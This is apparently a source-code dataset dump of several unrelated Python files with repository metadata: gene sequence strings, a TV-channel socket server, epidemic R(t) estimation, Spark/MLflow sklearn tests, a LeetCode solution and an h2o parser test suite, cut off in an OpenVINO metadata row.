hemo_dna_seq = 'ATGGGTGCTTTTACTGAAAAACAAGAGGCTTTGGTTTCTTCTAGCTTTGAAGCTTTTAAAGCTAACATTCCACAATATTCTGTTGTTTTTTATACTTCTATTTTGGAAAAAGCTCCTGCTGCTAAAGATTTGTTTTCTTTTTTGTCTAATGGTGTTGATCCATCTAATCCAAAATTGACTGGTCATGCTGAAAAATTGTTTGGTTTGGTTAGAGATTCTGCTGGTCAATTGAAAGCTAATGGTACTGTTGTTGCTGATGCTGCTTTGGGTTCTATTCATGCTCAAAAAGCTATTACTGATCCACAATTTGTTGTTGTTAAAGAAGCTTTGTTGAAAACTATTAAAGAAGCTGTTGGTGATAAATGGTCTGATGAATTGTCTTCTGCTTGGGAAGTTGCTTATGATGAATTGGCTGCTGCTATTAAAAAAGCTTTTAAAAGCTTTTTTAATAGCAGCAGCCAATTCATCATAAGCAACTTCCCAAGCAGAAGACAATTCATCAGACCATTTATCACCAACAGCTTCTTTAATAGTTTTCAACAAAGCTTCTTTAACAACAACAAATTGTGGATCAGTAATAGCTTTTTGAGCATGAATAGAACCCAAAGCAGCATCAGCAACAACAGTACCATTAGCTTTCAATTGACCAGCAGAATCTCTAACCAAACCAAACAATTTTTCAGCATGACCAGTCAATTTTGGATTAGATGGATCAACACCATTAGACAAAAAAGAAAACAAATCTTTAGCAGCAGGAGCTTTTTCCAAAATAGAAGTATAAAAAACAACAGAATATTGTGGAATGTTAGCTTTAAAAGCTTCAAAGCTAGAAGAAACCAAAGCCTCTTGTTTTTCAGTAAAAGCACCCATATGCTTCCAAGATTCTGGTGGGAATACTGCTGATAGCCTAACGTTCATGATCAAAATTTAACTGTTCTAACCCCTACTTGACAGGCAATATATAAACAGAAGGAAGCTGCCCTGTCTTAAACCTTTTTTTTTATCATCATTATTAGCTTACTTTCATAATTGCGACTGGTTCCAATTGACAAGCTTTTGATTTTAACGACTTTTAACGACAACTTGAGAAGATCAAAAAACAACTAATTATTCGAAACGATGGCTATCCCCGAAGAGTTTGATATCCTAGTTCTAGGTGGTGGATCCAGTGGATCCTGTATTGCCGGAAGATTGGCAAACTTGGACCACTCCTTGAAAGTACTTTCAAGGAGTGGTCCAAGTTTGCCAATCTTCCGGCAATACAGGATCCACTGGATCCACCACCTAGAACTAGGATATCAAACTCTTCGGGGATAGCCATCGTTTCGAATAATTAGTTGTTTTTTGATCTTCTCAAGTTGTCGTTAAAAGTCGTTAAAATCAAAAGCTTGTCAATTGGAACCAGTCGCAATTATGAAAGTAAGCTAATAATGATGATAAAAAAAAAGGTTTAAGACAGGGCAGCTTCCTTCTGTTTATATATTGCCTGTCAAGTAGGGGTTAGAACAGTTAAATTTTGATCATGAACGTTAGGCTATCAGCAGTATTCCCACCAGAATCTTGGAAGCATACTGACAATAAAAAGATTCTTGTTTTCAAGAACTTGTCATTTGTATAGTTTTTTTATATTGTAGTTGTTCTATTTTAATCAAATGTTAGCGTGATTTATATTTTTTTTCGCCTCGACATCATCTGCCCAGATGCGAAGTTAAGTGCGCAGAAAGTAATATCATGCGTCAATCGTATGTGAATGCTGGTCGCTATACTGCAGTATAGCGACCAGCATTCACATACGATTGACGCATGATATTACTTTCTGCGCACTTAACTTCGCATCTGGGCAGATGATGTCGAGGCGAAAAAAAATATAAATCACGCTAACATTTGATTAAAATAGAACAACTACAATATAAAAAAACTATACAAATGACAAGTTCTTGAAAACAAGAATCTTTTTATTGTCAGT'
hemo_rna_seq = 'AAAAGCUUUUUUAAUAGCAGCAGCCAAUUCAUCAUAAGCAACUUCCCAAGCAGAAGACAAUUCAUCAGACCAUUUAUCACCAACAGCUUCUUUAAUAGUUUUCAACAAAGCUUCUUUAACAACAACAAAUUGUGGAUCAGUAAUAGCUUUUUGAGCAUGAAUAGAACCCAAAGCAGCAUCAGCAACAACAGUACCAUUAGCUUUCAAUUGACCAGCAGAAUCUCUAACCAAACCAAACAAUUUUUCAGCAUGACCAGUCAAUUUUGGAUUAGAUGGAUCAACACCAUUAGACAAAAAAGAAAACAAAUCUUUAGCAGCAGGAGCUUUUUCCAAAAUAGAAGUAUAAAAAACAACAGAAUAUUGUGGAAUGUUAGCUUUAAAAGCUUCAAAGCUAGAAGAAACCAAAGCCUCUUGUUUUUCAGUAAAAGCACCCAU'
hemo_aa_seq = 'MGAFTEKQEALVSSSFEAFKANIPQYSVVFYTSILEKAPAAKDLFSFLSNGVDPSNPKLTGHAEKLFGLVRDSAGQLKANGTVVADAALGSIHAQKAITDPQFVVVKEALLKTIKEAVGDKWSDELSSAWEVAYDELAAAIKKAF' | 2,717.5 | 8,891 | 0.997853 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 16,212 | 0.994296 |
17da768787ed79973072983b3cce0e340bf8fc26 | 1,304 | py | Python | PythonSelenium/src/server.py | talhaHavadar/MomTV | 1673b8d41a3d6157b7e1ba5ba4bd3ad7a70a3ba9 | [
"MIT"
] | 1 | 2019-02-23T06:41:58.000Z | 2019-02-23T06:41:58.000Z | PythonSelenium/src/server.py | talhaHavadar/MomTV | 1673b8d41a3d6157b7e1ba5ba4bd3ad7a70a3ba9 | [
"MIT"
] | null | null | null | PythonSelenium/src/server.py | talhaHavadar/MomTV | 1673b8d41a3d6157b7e1ba5ba4bd3ad7a70a3ba9 | [
"MIT"
] | null | null | null | """
Handles all requests that coming from phone
"""
import socketserver
import bot
from bot import TVBot
class TCPSocketHandler(socketserver.StreamRequestHandler):
"""
Handles the tcp socket connection
"""
def handle(self):
self.bot = TVBot()
while True:
self.data = self.rfile.readline()
if not self.data:
break
self.data = self.data.decode()
if "STAR" in self.data.upper():
self.bot.open(bot.TV_STAR)
elif "ATV" in self.data.upper():
self.bot.open(bot.TV_ATV)
elif "KANAL D" in self.data.upper() or "KANALD" in self.data.upper():
self.bot.open(bot.TV_KANALD)
elif "TRT" in self.data.upper():
self.bot.open(bot.TV_TRT)
elif "FOX" in self.data.upper():
self.bot.open(bot.TV_FOX)
elif "SHOW TV" in self.data.upper() or "SHOW" in self.data.upper():
self.bot.open(bot.TV_SHOW)
elif "TV2" in self.data.upper() or "TV 2" in self.data.upper():
self.bot.open(bot.TV_TV2)
elif "KAPAT" in self.data.upper() or "CLOSE" in self.data.upper():
self.bot.close()
self.bot.close()
| 34.315789 | 81 | 0.537577 | 1,192 | 0.91411 | 0 | 0 | 0 | 0 | 0 | 0 | 186 | 0.142638 |
17dbf62f58a11e99d5780b17f22714e9a8df977a | 3,640 | py | Python | pydemic/fitting/Rt.py | PyDemic/pydemic | 7e748e4bbe5c1f7fb209271af0ff8afb8fbd4fd5 | [
"MIT"
] | 3 | 2020-05-10T23:52:41.000Z | 2021-08-31T14:38:24.000Z | pydemic/fitting/Rt.py | PyDemic/pydemic | 7e748e4bbe5c1f7fb209271af0ff8afb8fbd4fd5 | [
"MIT"
] | 1 | 2020-09-27T03:26:51.000Z | 2022-03-30T12:18:08.000Z | pydemic/fitting/Rt.py | PyDemic/pydemic | 7e748e4bbe5c1f7fb209271af0ff8afb8fbd4fd5 | [
"MIT"
] | 1 | 2020-10-01T04:07:39.000Z | 2020-10-01T04:07:39.000Z | import pandas as pd
from . import K
from .epidemic_curves import epidemic_curve
from .utils import cases
from .. import formulas
from ..diseases import disease as get_disease
from ..docs import docstring
ARGS = """Args:
model ({'SIR', 'SEIR', 'SEAIR', etc}):
Epidemic model used to compute R(t) from K(t)
curves (pd.DataFrame):
A dataframe with epidemic curves.
window (int):
Window size of triangular smoothing. Can be a single number or
a 2-tuple with the window used to compute daily cases and the window
used to smooth out the log-derivative.
Re (bool):
If True, return the effective reproduction number, instead of R0. Re
does not consider the depletion of susceptibles and thus does not
require to known the population size.
population:
Required parameter to obtain R(t), if model is passed as a string.
This may be required if params is initialized from a disease object.
params:
Optional object holding simulation params. This argument is not necessary
if model can be treated as Params or if a disease is given.
"""
METHODS_RT = {}
METHODS_R0 = {}
METHODS = {"Rt": METHODS_RT, "R0": METHODS_R0}
def method(which, names):
"""
Decorator that register implementations to be used by the estimate_Rt()
and estimate_R() functions.
"""
names = [names] if isinstance(names, str) else names
db = METHODS[which]
def decorator(fn):
for name in names:
db[name] = fn
return fn
return decorator
@docstring(args=ARGS)
def estimate_Rt(model, curves: pd.DataFrame, method="RollingOLS", **kwargs) -> pd.DataFrame:
"""
Estimate R(t) from epidemic curves and model.
{args}
Returns:
A DataFrame with "Rt" and possibly other columns, depending on the
method.
See Also:
naive_Rt
rolling_OLS_Rt
"""
return METHODS_RT[method](model, curves, **kwargs)
@docstring(args=ARGS)
@method("Rt", "naive")
def naive_Rt(model, curves: pd.DataFrame, window=14, **kwargs) -> pd.DataFrame:
"""
Naive inference of R(t) from Epidemic curves using the naive_Kt() function.
{args}
See Also:
:func:`pydemic.fitting.K.naive_Kt`
"""
Kt = K.naive_Kt(curves, window=window)
return Rt_from_Kt(model, curves, Kt, **kwargs)
@docstring(args=ARGS)
@method("Rt", ["RollingOLS", "ROLS"])
def rolling_OLS_Rt(model: str, curves: pd.DataFrame, window=14, **kwargs):
"""
Compute R(t) from K(t) using the K.rolling_ols() function.
{args}
See Also:
:func:`pydemic.fitting.K.rolling_OLS_Kt`
"""
Kt = K.rolling_OLS_Kt(curves, window=window)
return Rt_from_Kt(model, curves, Kt, **kwargs)
#
# Auxiliary functions
#
def Rt_from_Kt(model, curves, Kt, Re=False, **kwargs) -> pd.DataFrame:
"""
Return Rt from Kt for model.
Wraps a common logic for many functions in this module.
"""
if isinstance(model, str):
params = None
else:
params = model
model = model.epidemic_model_name()
params = kwargs.pop("params", params)
if params is None:
disease = get_disease()
params = disease.params()
re = pd.DataFrame(
{col: formulas.R0_from_K(model, params, K=data, **kwargs) for col, data in Kt.iteritems()}
)
re.columns = ["Rt" + c[2:] if c.startswith("Kt") else c for c in re.columns]
if Re:
return re
data = epidemic_curve(model, cases(curves), params)
depletion = data["susceptible"] / data.sum(1)
re /= depletion.values[:, None]
return re
| 27.164179 | 98 | 0.64533 | 0 | 0 | 0 | 0 | 1,183 | 0.325 | 0 | 0 | 1,811 | 0.497527 |
17dd134a81d8c44b28955eff31849c98b00f6958 | 5,099 | py | Python | python/tests/spark/sql/codegen/test_sklearn_flavor.py | askintution/rikai | 53a72a19beafc4097a816efb9cddd063e107e67a | [
"Apache-2.0"
] | 1 | 2022-02-18T07:53:29.000Z | 2022-02-18T07:53:29.000Z | python/tests/spark/sql/codegen/test_sklearn_flavor.py | askintution/rikai | 53a72a19beafc4097a816efb9cddd063e107e67a | [
"Apache-2.0"
] | null | null | null | python/tests/spark/sql/codegen/test_sklearn_flavor.py | askintution/rikai | 53a72a19beafc4097a816efb9cddd063e107e67a | [
"Apache-2.0"
] | null | null | null | # Copyright (c) 2021 Rikai Authors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from pathlib import Path
import mlflow
import numpy as np
import pytest
from pyspark.sql import Row, SparkSession
from pyspark.sql.types import DoubleType, LongType, StructField, StructType
from sklearn.datasets import make_classification
from sklearn.decomposition import PCA
from sklearn.ensemble import RandomForestClassifier
from sklearn.linear_model import LinearRegression
import rikai
def test_sklearn_linear_regression(tmp_path: Path, spark: SparkSession):
# prepare training data
X = np.array([[1, 1], [1, 2], [2, 2], [2, 3]])
y = np.dot(X, np.array([1, 2])) + 3
model = LinearRegression()
tmp_path.mkdir(parents=True, exist_ok=True)
tracking_uri = "sqlite:///" + str(tmp_path / "tracking.db")
mlflow.set_tracking_uri(tracking_uri)
with mlflow.start_run():
model.fit(X, y)
reg_model_name = "sklearn_linear_regression"
model_name = "sk_lr_m"
rikai.mlflow.sklearn.log_model(
model,
artifact_path="model",
schema="double",
registered_model_name=reg_model_name,
)
spark.conf.set(
"spark.rikai.sql.ml.registry.mlflow.tracking_uri", tracking_uri
)
spark.sql(
f"""
CREATE MODEL {model_name} USING 'mlflow:///{reg_model_name}';
"""
)
df = spark.range(2).selectExpr("id as x0", "id+1 as x1")
df.createOrReplaceTempView("tbl_X")
result = spark.sql(
f"""
select ML_PREDICT({model_name}, array(x0, x1)) as pred from tbl_X
"""
)
assert result.schema == StructType([StructField("pred", DoubleType())])
assert result.count() == 2
def test_sklearn_random_forest(tmp_path: Path, spark: SparkSession):
X, y = make_classification(
n_samples=1000,
n_features=4,
n_informative=2,
n_redundant=0,
random_state=0,
shuffle=False,
)
# train a model
model = RandomForestClassifier(max_depth=2, random_state=0)
tmp_path.mkdir(parents=True, exist_ok=True)
tracking_uri = "sqlite:///" + str(tmp_path / "tracking.db")
mlflow.set_tracking_uri(tracking_uri)
with mlflow.start_run():
model.fit(X, y)
reg_model_name = "sklearn_random_forest"
model_name = "sk_rf_m"
rikai.mlflow.sklearn.log_model(
model,
artifact_path="model",
schema="long",
registered_model_name=reg_model_name,
)
spark.conf.set(
"spark.rikai.sql.ml.registry.mlflow.tracking_uri", tracking_uri
)
spark.sql(
f"""
CREATE MODEL {model_name} USING 'mlflow:///{reg_model_name}';
"""
)
df = spark.range(2).selectExpr(
"id as x0", "id+1 as x1", "id+2 as x2", "id+3 as x3"
)
df.createOrReplaceTempView("tbl_X")
result = spark.sql(
f"""
select
ML_PREDICT({model_name}, array(x0, x1, x2, x3)) as pred
from tbl_X
"""
)
result.show()
assert result.schema == StructType([StructField("pred", LongType())])
assert (
result.collect()
== spark.createDataFrame([Row(pred=1), Row(pred=1)]).collect()
)
def test_sklearn_pca(tmp_path: Path, spark: SparkSession):
X = np.array([[-1, -1], [-2, -1], [-3, -2], [1, 1], [2, 1], [3, 2]])
model = PCA(n_components=2)
tmp_path.mkdir(parents=True, exist_ok=True)
tracking_uri = "sqlite:///" + str(tmp_path / "tracking.db")
mlflow.set_tracking_uri(tracking_uri)
with mlflow.start_run():
model.fit(X)
model_name = "sklearn_pca"
reg_model_name = model_name
rikai.mlflow.sklearn.log_model(
model,
"model",
schema="array<float>",
registered_model_name=reg_model_name,
)
spark.conf.set(
"spark.rikai.sql.ml.registry.mlflow.tracking_uri", tracking_uri
)
spark.sql(
f"""
CREATE MODEL {model_name} USING 'mlflow:///{reg_model_name}';
"""
)
result = spark.sql(
f"""
select ML_PREDICT({model_name}, array(3, 2)) as pred
"""
)
result.show(1, vertical=False, truncate=False)
assert (
pytest.approx(result.head().pred) == model.transform([[3, 2]])[0]
)
| 31.282209 | 79 | 0.596195 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1,663 | 0.326142 |
17ddf5f60cc34f1cbebcbf7f7b6413d3c56bbf83 | 813 | py | Python | Leetcode/week_2/p0811_subdomain_visit_count.py | SamSamhuns/wallbreakers_projekts | c07b555127ee89d6f461cea7cd87811c382086ff | [
"MIT"
] | 1 | 2021-07-07T00:55:23.000Z | 2021-07-07T00:55:23.000Z | Leetcode/week_2/p0811_subdomain_visit_count.py | SamSamhuns/wallbreakers_projekts | c07b555127ee89d6f461cea7cd87811c382086ff | [
"MIT"
] | null | null | null | Leetcode/week_2/p0811_subdomain_visit_count.py | SamSamhuns/wallbreakers_projekts | c07b555127ee89d6f461cea7cd87811c382086ff | [
"MIT"
] | null | null | null | from typing import List
from collections import defaultdict
class Solution:
def subdomainVisits(self, cpdomains: List[str]) -> List[str]:
domain_visits = defaultdict(int)
for cpdomain in cpdomains:
count, domain = cpdomain.split()
dots_idx = [i for i, char in enumerate(domain) if char == '.']
domain_visits[domain] += int(count)
for idx in dots_idx:
domain_visits[domain[idx + 1:]] += int(count)
return [' '.join([str(domain_visits[dom]), dom]) for dom in domain_visits]
"""
Runtime: O(4N) ~ O(N) runtime
Space: O(N)
Runtime: 52 ms, faster than 73.52% of Python3 online submissions for Subdomain Visit Count.
Memory Usage: 12.8 MB, less than 100.00% of Python3 online submissions for Subdomain Visit Count.
"""
| 29.035714 | 97 | 0.646986 | 507 | 0.623616 | 0 | 0 | 0 | 0 | 0 | 0 | 246 | 0.302583 |
17de742785e7e376b1d10db620dbbd2f43d27408 | 15,752 | py | Python | h2o-bindings/bin/pyunit_parser_test.py | vishalbelsare/h2o-3 | 9322fb0f4c0e2358449e339a434f607d524c69fa | [
"Apache-2.0"
] | 6,098 | 2015-05-22T02:46:12.000Z | 2022-03-31T16:54:51.000Z | h2o-bindings/bin/pyunit_parser_test.py | vishalbelsare/h2o-3 | 9322fb0f4c0e2358449e339a434f607d524c69fa | [
"Apache-2.0"
] | 2,517 | 2015-05-23T02:10:54.000Z | 2022-03-30T17:03:39.000Z | h2o-bindings/bin/pyunit_parser_test.py | vishalbelsare/h2o-3 | 9322fb0f4c0e2358449e339a434f607d524c69fa | [
"Apache-2.0"
] | 2,199 | 2015-05-22T04:09:55.000Z | 2022-03-28T22:20:45.000Z | #!/usr/bin/env python
# -*- encoding: utf-8 -*-
"""Test case for pyparser."""
from __future__ import division, print_function
import os
import re
import textwrap
import tokenize
from future.builtins import open
import pyparser
def _make_tuple(op):
return lambda x: (op, x)
NL = tokenize.NL
NEWLINE = tokenize.NEWLINE
NAME = _make_tuple(tokenize.NAME)
OP = _make_tuple(tokenize.OP)
INDENT = tokenize.INDENT
DEDENT = tokenize.DEDENT
COMMENT = tokenize.COMMENT
STRING = tokenize.STRING
NUMBER = tokenize.NUMBER
END = tokenize.ENDMARKER
token_names = {NL: "NL", NEWLINE: "NEWLINE", INDENT: "INDENT", COMMENT: "COMMENT", DEDENT: "DEDENT",
STRING: "STRING", NUMBER: "NUMBER", END: "END", tokenize.OP: "OP", tokenize.NAME: "NAME"}
Ws = pyparser.Whitespace
Comment = pyparser.Comment
Comment_banner = (pyparser.Comment, "banner")
Comment_code = (pyparser.Comment, "code")
Docstring = pyparser.Docstring
Import_future = (pyparser.ImportBlock, "future")
Import_stdlib = (pyparser.ImportBlock, "stdlib")
Import_3rdpty = (pyparser.ImportBlock, "third-party")
Import_1stpty = (pyparser.ImportBlock, "first-party")
Expression = pyparser.Expression
Function = (pyparser.Callable, "def")
Class = (pyparser.Callable, "class")
def assert_same_code(code1, code2):
"""Verify whether 2 code fragments are identical, and if not print an error message."""
regex = re.compile(r"\s+\\$", re.M)
code1 = re.sub(regex, r"\\", code1)
code2 = re.sub(regex, r"\\", code2)
if code2 != code1:
print()
lines_code1 = code1.splitlines()
lines_code2 = code2.splitlines()
n_diffs = 0
for i in range(len(lines_code1)):
old_line = lines_code1[i]
new_line = lines_code2[i] if i < len(lines_code2) else ""
if old_line != new_line:
print("%3d - %s" % (i + 1, old_line))
print("%3d + %s" % (i + 1, new_line))
n_diffs += 1
if n_diffs == 5: break
raise AssertionError("Unparsed code1 does not match the original.")
def test_tokenization():
"""
Test function for ``pyparser._normalize_tokens()``.
Even though this function is private, it is extremely important to verify that it behaves correctly. In
particular, we want to check that it does not break the round-trip guarantee of the tokenizer, and that it
fixes all the problems that the original tokenizer has.
"""
# Helper functions
def _parse_to_tokens(text):
"""Parse text into tokens and then normalize them."""
gen = iter(text.splitlines(True)) # True = keep newlines
readline = gen.next if hasattr(gen, "next") else gen.__next__
return pyparser._tokenize(readline)
def _unparse_tokens(tokens):
"""Convert tokens back into the source code."""
return tokenize.untokenize(t.token for t in tokens)
def _assert_tokens(tokens, target):
"""Check that the tokens list corresponds to the target provided."""
for i in range(len(tokens)):
assert i < len(target), "Token %d %r not expected" % (i, tokens[i])
tok = tokens[i]
trg = target[i]
valid = False
if isinstance(trg, int):
if tok.op == trg: valid = True
name = token_names[trg]
elif isinstance(trg, tuple) and len(trg) == 2:
if tok.op == trg[0] and tok.str == trg[1]: valid = True
name = "%s(%s)" % (token_names[trg[0]], trg[1])
else:
assert False, "Unknown target: %r" % trg
if not valid:
assert False, "Mismatched token %d: found %r, should be %r" % (i, tok, name)
assert len(target) == len(tokens), "Expected too many tokens: %d vs %d" % (len(tokens), len(target))
def check_code(code, expected_tokens=None, filename=None):
"""Test parsing of the given piece of code."""
code = textwrap.dedent(code)
if filename:
print("Testing tokenization of %s:" % filename, end=" ")
else:
check_code.index = getattr(check_code, "index", 0) + 1
print("Testing tokenization %d:" % check_code.index, end=" ")
tokens = _parse_to_tokens(code)
try:
try:
unparsed = _unparse_tokens(tokens)
except ValueError as e:
raise AssertionError("Cannot unparse tokens: %s" % e)
assert_same_code(code, unparsed)
if expected_tokens:
_assert_tokens(tokens, expected_tokens)
print("ok")
except AssertionError as e:
print(u"Error: %s" % e)
print(u"Original code fragment:\n" + code)
print("Tokens:")
for i, tok in enumerate(tokens):
print("%3d %r" % (i, tok))
raise
check_code("""
try:
while True:
pass
# comment
except: pass
""", [NL, NAME("try"), OP(":"), NEWLINE, INDENT, NAME("while"), NAME("True"), OP(":"), NEWLINE,
INDENT, NAME("pass"), NEWLINE, COMMENT, NL, DEDENT, DEDENT, NAME("except"), OP(":"),
NAME("pass"), NEWLINE, END]
)
check_code("""
try:
while True:
pass
# comment
except: pass
""", [NL, NAME("try"), OP(":"), NEWLINE, INDENT, NAME("while"), NAME("True"), OP(":"), NEWLINE,
INDENT, NAME("pass"), NEWLINE, DEDENT, COMMENT, NL, DEDENT, NAME("except"), OP(":"),
NAME("pass"), NEWLINE, END]
)
check_code("""
try:
while True:
pass
# comment
except: pass
""", [NL, NAME("try"), OP(":"), NEWLINE, INDENT, NAME("while"), NAME("True"), OP(":"), NEWLINE,
INDENT, NAME("pass"), NEWLINE, DEDENT, DEDENT, COMMENT, NL, NAME("except"), OP(":"),
NAME("pass"), NEWLINE, END]
)
check_code("""
def func():
# function
pass
""", [NL, NAME("def"), NAME("func"), OP("("), OP(")"), OP(":"), NEWLINE, INDENT, COMMENT, NL,
NAME("pass"), NEWLINE, DEDENT, END])
check_code("""
def func(): # function
# hanging comment
pass
""", [NL, NAME("def"), NAME("func"), OP("("), OP(")"), OP(":"), COMMENT, NEWLINE, INDENT, COMMENT, NL,
NAME("pass"), NEWLINE, DEDENT, END])
check_code("""
def foo():
pass
#comment
def bar():
pass
""", [NL, NAME("def"), NAME("foo"), OP("("), OP(")"), OP(":"), NEWLINE, INDENT, NAME("pass"), NEWLINE,
DEDENT, NL, COMMENT, NL, NAME("def"), NAME("bar"), OP("("), OP(")"), OP(":"), NEWLINE, INDENT,
NAME("pass"), NEWLINE, DEDENT, END])
check_code("""
def hello():
print("hello")
""", [NL, NAME("def"), NAME("hello"), OP("("), OP(")"), OP(":"), NEWLINE, INDENT, NL, NL,
NAME("print"), OP("("), STRING, OP(")"), NEWLINE, DEDENT, END])
check_code("""
class Foo:
def foo(self):
pass
def bar(self):
return
""", [NL, NAME("class"), NAME("Foo"), OP(":"), NEWLINE, INDENT, NAME("def"), NAME("foo"), OP("("),
NAME("self"), OP(")"), OP(":"), NEWLINE, INDENT, NAME("pass"), NEWLINE, DEDENT, NL, NAME("def"),
NAME("bar"), OP("("), NAME("self"), OP(")"), OP(":"), NEWLINE, INDENT, NAME("return"), NEWLINE, DEDENT,
DEDENT, END])
check_code("""
def foo():
# Attempt to create the output directory
try:
os.makedirs(destdir)
except OSError as e:
raise
""", [NL, NAME("def"), NAME("foo"), OP("("), OP(")"), OP(":"), NEWLINE, INDENT, COMMENT, NL, NAME("try"),
OP(":"), NEWLINE, INDENT, NAME("os"), OP("."), NAME("makedirs"), OP("("), NAME("destdir"), OP(")"),
NEWLINE, DEDENT, NAME("except"), NAME("OSError"), NAME("as"), NAME("e"), OP(":"), NEWLINE, INDENT,
NAME("raise"), NEWLINE, DEDENT, DEDENT, END])
check_code("""
if PY2:
def unicode():
raise RuntimeError # disable this builtin function
# because it doesn't exist in Py3
handler = lambda: None # noop
# (will redefine later)
################################################################################
# comment 1
print("I'm done.")
""", [NL, NAME("if"), NAME("PY2"), OP(":"), NEWLINE, INDENT, NAME("def"), NAME("unicode"), OP("("), OP(")"),
OP(":"), NEWLINE, INDENT, NAME("raise"), NAME("RuntimeError"), COMMENT, NEWLINE, COMMENT, NL,
DEDENT, DEDENT, NL, NAME("handler"), OP("="), NAME("lambda"), OP(":"), NAME("None"), COMMENT, NEWLINE,
COMMENT, NL, NL, COMMENT, NL, NL, COMMENT, NL, NAME("print"), OP("("), STRING, OP(")"), NEWLINE, END])
check_code("""
def test3():
x = 1
# bad
print(x)
""", [NL, NAME("def"), NAME("test3"), OP("("), OP(")"), OP(":"), NEWLINE, INDENT, NAME("x"), OP("="),
NUMBER, NEWLINE, COMMENT, NL, NAME("print"), OP("("), NAME("x"), OP(")"), NEWLINE, DEDENT, END])
check_code("""
class Foo(object):
#-------------
def bar(self):
if True:
pass
# Originally the DEDENTs are all the way down near the decorator. Here we're testing how they'd travel
# all the way up across multiple comments.
# comment 3
# commmmmmmment 4
@decorator
""", [NL, NAME("class"), NAME("Foo"), OP("("), NAME("object"), OP(")"), OP(":"), NEWLINE, INDENT,
COMMENT, NL, NAME("def"), NAME("bar"), OP("("), NAME("self"), OP(")"), OP(":"), NEWLINE, INDENT,
NAME("if"), NAME("True"), OP(":"), NEWLINE, INDENT, NAME("pass"), NEWLINE,
DEDENT, DEDENT, DEDENT, NL, COMMENT, NL, COMMENT, NL, NL, COMMENT, NL, NL, COMMENT,
NL, OP("@"), NAME("decorator"), NEWLINE, END])
# Really, one should avoid code like this.... It won't break the normalizer, but may create problems down
# the stream.
check_code("""
if True:
if False:
# INDENT will be inserted before this comment
raise
# DEDENT will be after this comment
else:
praise()
""", [NL, NAME("if"), NAME("True"), OP(":"), NEWLINE, INDENT, NAME("if"), NAME("False"), OP(":"), NEWLINE,
INDENT, COMMENT, NL, NAME("raise"), NEWLINE, COMMENT, NL, DEDENT, NAME("else"), OP(":"), NEWLINE,
INDENT, NAME("praise"), OP("("), OP(")"), NEWLINE, DEDENT, DEDENT, END])
for directory in [".", "../../h2o-py/h2o", "../../h2o-py/tests"]:
absdir = os.path.abspath(directory)
for dir_name, subdirs, files in os.walk(absdir):
for f in files:
if f.endswith(".py"):
filename = os.path.join(dir_name, f)
with open(filename, "rt", encoding="utf-8") as fff:
check_code(fff.read(), filename=filename)
def test_pyparser():
"""Test case: general parsing."""
def _check_blocks(actual, expected):
assert actual, "No parse results"
for i in range(len(actual)):
assert i < len(expected), "Unexpected block %d:\n%r" % (i, actual[i])
valid = False
if isinstance(expected[i], type):
if isinstance(actual[i], expected[i]): valid = True
elif isinstance(expected[i], tuple):
if isinstance(actual[i], expected[i][0]) and actual[i].type == expected[i][1]: valid = True
if not valid:
assert False, "Invalid block: expected %r, got %r" % (expected[i], actual[i])
def check_code(code, blocks=None, filename=None):
code = textwrap.dedent(code)
if not code.endswith("\n"): code += "\n"
if filename:
print("Testing file %s..." % filename, end=" ")
else:
check_code.index = getattr(check_code, "index", 0) + 1
print("Testing code fragment %d..." % check_code.index, end=" ")
preparsed = None
parsed = None
unparsed = None
try:
preparsed = pyparser.parse_text(code)
parsed = preparsed.parse(2)
try:
unparsed = parsed.unparse()
except ValueError as e:
for i, tok in enumerate(parsed.tokens):
print("%3d %r" % (i, tok))
raise AssertionError("Cannot unparse code: %s" % e)
assert_same_code(code, unparsed)
if blocks:
_check_blocks(parsed.parsed, blocks)
print("ok")
except AssertionError as e:
print()
print(u"Error: " + str(e))
print(u"Original code fragment:\n" + code)
if unparsed: print(u"Unparsed code:\n" + unparsed)
if parsed:
print(parsed)
for i, tok in enumerate(parsed.tokens):
print("%3d %r" % (i, tok))
raise
except Exception as e:
print()
print(u"Error: " + str(e))
if preparsed:
print("Preparsed tokens:")
for i, tok in enumerate(preparsed.tokens):
print("%4d %r" % (i, tok))
else:
print("Initial parsing has failed...")
raise
check_code("""
# -*- encoding: utf-8 -*-
# copyright: 2016 h2o.ai
\"\"\"
A code example.
It's not supposed to be functional, or even functionable.
\"\"\"
from __future__ import braces, antigravity
# Standard library imports
import sys
import time
import this
import h2o
from h2o import H2OFrame, init
from . import *
# Do some initalization for legacy python versions
if PY2:
def unicode():
raise RuntimeError # disable this builtin function
# because it doesn't exist in Py3
handler = lambda: None # noop
# (will redefine later)
################################################################################
# comment 1
class Foo(object):
#------ Public -------------------------------------------------------------
def bar(self):
pass
# def foo():
# print(1)
#
# print(2)
# comment 2
@decorated(
1, 2, (3))
@dddd
def bar():
# be
# happy
print("bar!")
# bye""", [Ws, Comment, Docstring, Import_future, Ws, Import_stdlib, Ws, Import_1stpty, Ws, Expression,
Ws, Expression, Ws, Comment_banner, Ws, Class, Ws, Comment_code, Ws, Function, Comment, Ws])
for directory in [".", "../../h2o-py", "../../py"]:
absdir = os.path.abspath(directory)
for dir_name, subdirs, files in os.walk(absdir):
for f in files:
if f.endswith(".py"):
filename = os.path.join(dir_name, f)
with open(filename, "rt", encoding="utf-8") as fff:
check_code(fff.read(), filename=filename)
# test_tokenization()
test_pyparser()
| 38.702703 | 117 | 0.509777 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6,055 | 0.384396 |
17e0d5e504ccaae3246c922d12121bf9759c86a5 | 29,139 | py | Python | tools/pot/openvino/tools/pot/algorithms/quantization/accuracy_aware_common/algorithm.py | chccc1994/openvino | 41f7893ae81d186d15c1754b179bf32a66d03bcf | [
"Apache-2.0"
] | 2,406 | 2020-04-22T15:47:54.000Z | 2022-03-31T10:27:37.000Z | tools/pot/openvino/tools/pot/algorithms/quantization/accuracy_aware_common/algorithm.py | thomas-yanxin/openvino | 031e998a15ec738c64cc2379d7f30fb73087c272 | [
"Apache-2.0"
